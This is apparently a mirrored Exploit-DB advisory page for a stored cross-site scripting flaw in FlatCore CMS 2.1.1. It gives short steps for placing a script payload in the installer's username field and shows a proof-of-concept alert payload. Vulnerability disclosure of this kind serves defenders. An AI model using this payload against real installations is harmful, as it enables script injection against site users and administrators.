FlatCore CMS 2.1.1 – Stored Cross-Site Scripting (XSS)

  • 作者: Sinem Şahin
    日期: 2023-03-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51068/
  • # Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting
    # Date: 2020-09-24
    # Exploit Author: Sinem Şahin
    # Vendor Homepage: https://flatcore.org/
    # Version: 2.1.1
    # Tested on: Windows & XAMPP
    
    ==> Tutorial <==
    
    1- Go to the following url. => http://(HOST)/install/index.php
    2- Write XSS Payload into the username of the user account.
    3- Press "Save" button.
    
    XSS Payload ==> "<script>alert("usernameXSS")</script>